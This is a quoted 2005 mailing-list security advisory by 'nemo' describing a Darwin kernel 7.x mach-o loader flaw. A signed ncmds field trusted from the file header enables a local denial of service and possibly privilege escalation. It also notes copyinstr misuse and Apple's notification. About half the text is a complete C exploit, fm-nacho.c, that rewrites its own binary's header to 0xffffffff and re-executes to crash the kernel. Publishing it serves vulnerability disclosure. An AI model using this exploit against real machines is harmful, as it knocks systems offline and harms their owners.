Re: Darwin Kernel Vulnerability
On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo@xxxxxxxxxxxxxxxx wrote:
> "moderator: resending this mail since it appears to of got dropped, if not,
> please ignore this message.
>
> _,'| _.-''``-...___..--';)
> /_ \'. __..-' , ,--...--'''
> <\ .`--''' ` /'
> `-';' ; ; ;
> __...--'' ___...--_..' .;.'
> fL (,__....----''' (,..--'' felinemenace.org
>
>> Program: Darwin Kernel 7.1
Effects <= Darwin Kernel 7.7.0
Sorry about the rushed advisory.
- nemo
> Impact: DoS, Possible local privilege escalation.
> Discovered: 8th January 2005 by nemo -( nemo @ felinemenace.org )-
> Writeup and exploits:
>
> 1) Background
>
> Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3
> Some of the bugs we investigated exist due to lack of input validation in the
> mach-o
> loader.
>
> 2) Description
>
> In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the
> most part
> each field is trusted to be acceptable.
>
> In the mach-o loader code (parse_machfile()) ncmds and offset are both
> declared as
> signed integers, however the appropriate structs used to read from the file
> are
> unsigned.
> After a little investigation a DoS was quickly written to set ncmds to -1.
>
> ncmds = header->ncmds;
> while (ncmds--) {
>
> The attached code will cause a denial of service on MacOSX <= 10.3.7
>
> 3) Notes
> During our audit of the Darwin Kernel many bugs stood out, however we have
> not
> had time to follow through on most of them. Something that caught our
> attention
> was the misuse of the copyinstr() command. This function will not force a NULL
> character to be appended to the string copied in, however it seems in many
> cases
> the size passed to the function doesn't take this into account.
> Unfortunately, as security goes, its all about who posts first.
> http://www.immunitysec.com/downloads/nukido.pdf
>
> 4) Vendor status/notes/fixes/statements
> Apple have been notified about this bug.
>
> 5) Exploit
>
> //---------------------( fm-nacho.c )--------------------------
> /*
> * DoS for Darwin Kernel Version < 7.5.0
> * -(nemo@xxxxxxxxxxxxxxx)-
> * 2005
> *
> * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
> * irc.pulltheplug.org (#social)
> */
>
> #include <stdio.h>
>
> int main(int ac, char **av)
> {
> FILE *me;
> int rpl = 0xffffffff;
> fpos_t pos = 0x10;
> printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
> printf("-( nemo@xxxxxxxxxxxxxxx )-\n\n");
> printf("[+] Opening file for writing.\n");
> if(!(me = fopen(*av,"r+"))) {
> printf("[-] Error opening exe.\n");
> exit(1);
> }
> printf("[+] Seeking to ncmds.\n");
> if((fsetpos(me,&pos)) == -1) {
> printf("[-] Error seeking to ncmds.\n");
> exit(1);
> }
> printf("[+] Changing ncmds to 0x%x.\n",rpl);
> if(fwrite(&rpl,4,1,me) < 1) {
> printf("[-] Error writing to file.\n");
> exit(1);
> }
> fclose(me);
> printf("[+] Re-executing with modified mach-o header.\n");
> sleep(5);
> if(execv(*av,av) == -1 ) {
> printf("[-] Error executing %s, please run manually.\n",*av);
> exit(1);
> }
> exit(0); // hrm
> }
>
>